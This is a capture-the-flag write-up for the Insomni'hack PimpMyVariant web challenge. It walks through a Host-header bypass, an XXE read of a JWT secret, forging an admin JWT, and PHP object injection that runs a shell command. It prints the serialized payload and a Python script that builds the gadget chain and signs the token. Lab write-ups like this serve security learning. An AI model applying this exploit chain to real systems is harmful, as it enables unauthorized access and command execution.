INSOMNI'Hack CTF (PimpMyVariant) web challenge
Let's solve PimpMyVariant web challenge.
First we looked at the (robots.txt) file, which lists some useful endpoints.
The (todo) file contains nothing, and the flag file cannot be fetched directly, so we turned to the other endpoints: (readme), (new) and (log). None of them can be reached with the normal hostname; the Host header of the request has to be set to localhost or 127.0.0.1 before the server will serve them.
The first endpoint, (readme), returns the path to a file. Remember that path.
The second endpoint, (new), returns a form whose JavaScript sends a request to (/api) with an XML body.
That looked like XXE, so we replayed the same request with an external entity and tried to read the flag file. It failed: the name parameter is checked against a regex that only accepts a value exactly 32 characters long made of lowercase and uppercase letters, digits, (_) and (-).
The flag format contains {}, which breaks that regex, so the flag cannot be read through this XXE. The file named by the (/readme) endpoint, (/www/jwt.secret.txt), does not have that problem, so we read that instead.
After decoding the JWT we noticed that the value of that file is appended to the end of a list, and that the JWT also carries a PHP-serialized payload.
The first thing to notice is that the user is not an admin, and that this is checked through the PHP-serialized data. That is easy to change: set the boolean to true (1) and re-sign the JWT with the secret key we obtained through the XXE.
Where do we use this JWT? Remember the (/log) endpoint, which refuses access unless we are an admin. Now we are, so let's try it.
The log endpoint mentions a file called (UpdateLogViewer.inc). Reading it through the XXE was blocked by the regex again, but the file can simply be downloaded by requesting it directly in the browser (http://domain/UpdateLogViewer.inc). It contains PHP code that gives us a way to read the flag.
It is a simple class with two properties, (packgeName) and (logCmdReader) as they appear in the serialized data; by default logCmdReader holds the command (cat), which is used to read the log files. Both properties are public, so we can set them through the serialized data in the JWT: any package name and any command to execute. We wrote a few lines of PHP to create an object of this class carrying the command we want to run and, because the endpoint still requires an admin, a User object with fixed values next to it. Putting both objects into an array and serializing it gives:
a:2:{i:0;O:4:"User":3:{s:4:"name";s:4:"Flex";s:7:"isAdmin";b:1;s:2:"id";s:40:"b614a6abb42563aa38507862c1f33df0b43d57b3";}i:1;O:15:"UpdateLogViewer":2:{s:10:"packgeName";s:2:"xx";s:12:"logCmdReader";s:24:"cat /www/flag.txt && cat";}}
Signing that serialized array with the leaked secret gives the forged JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.y5vJUwP6xSrolc98ffZlrADmkj3s80XnSCS9blNuV2s
With this JWT, a request to the (/log) endpoint runs our command and returns the flag.
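As an added example (not part of the original write-up or the challenge code), the Python script below models the two pieces of the chain described above: the name filter that blocks the flag but lets the secret file through, and forging an admin JWT that carries the PHP-serialized gadget array. The regex itself, the JWT claim name "data" and the demo secret are assumptions; the serialized User and UpdateLogViewer objects are exactly the ones from the write-up.

```python
import base64
import hashlib
import hmac
import json
import re

# The write-up says the XXE "name" value must be 32 characters of
# upper/lowercase letters, digits, "_" and "-". The exact regex is assumed.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{32}")


def passes_name_filter(value: str) -> bool:
    """True if an XXE-expanded name would survive the server's regex."""
    return NAME_RE.fullmatch(value) is not None


class PhpObject:
    """A PHP object to serialize: class name plus ordered public properties."""

    def __init__(self, cls: str, props: dict):
        self.cls = cls
        self.props = props


def php_serialize(value) -> str:
    """Minimal PHP serialize() covering the types used in the gadget chain."""
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, list):
        items = "".join("i:%d;%s" % (i, php_serialize(v)) for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), items)
    if isinstance(value, PhpObject):
        props = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), props)
    raise TypeError("unsupported type: %r" % type(value))


def build_gadget_chain(command: str = "cat /www/flag.txt && cat", package: str = "xx") -> str:
    """The array from the write-up: an admin User plus an UpdateLogViewer
    whose public logCmdReader property is replaced by our command."""
    user = PhpObject("User", {
        "name": "Flex",
        "isAdmin": True,
        "id": "b614a6abb42563aa38507862c1f33df0b43d57b3",
    })
    viewer = PhpObject("UpdateLogViewer", {"packgeName": package, "logCmdReader": command})
    return php_serialize([user, viewer])


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_hs256_sign(claims: dict, secret: bytes) -> str:
    """Sign claims as an HS256 JWT with the leaked secret (no JWT library needed)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, ("%s.%s" % (header, payload)).encode(), hashlib.sha256).digest()
    return "%s.%s.%s" % (header, payload, _b64url(sig))


def jwt_hs256_verify(token: str, secret: bytes):
    """Server-side view: return the claims if the signature checks out, else None."""
    header, payload, sig = token.split(".")
    expected = hmac.new(secret, ("%s.%s" % (header, payload)).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        return None
    return json.loads(_b64url_decode(payload))


def forge_admin_token(secret: bytes, chain: str) -> str:
    """Wrap the serialized gadget chain in a signed JWT. The claim name "data"
    is an assumption; the challenge's real claim name is not in the write-up."""
    return jwt_hs256_sign({"data": chain}, secret)


if __name__ == "__main__":
    # Constructed demo secret; the real one was read from /www/jwt.secret.txt via XXE.
    secret = b"0123456789abcdef0123456789abcdef"
    print("flag-shaped value passes filter:", passes_name_filter("INS{not_readable_this_way}"))
    print("32-char secret passes filter:", passes_name_filter(secret.decode()))
    chain = build_gadget_chain()
    print(chain)
    token = forge_admin_token(secret, chain)
    print(token)
    print("server accepts forged token:", jwt_hs256_verify(token, secret) is not None)
```

The script is offline only; it produces the serialized array shown above byte for byte and a token whose header segment matches the one in the write-up, but whether the server accepts it depends on the real claim name and secret.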
Awesome!
Well done, Flex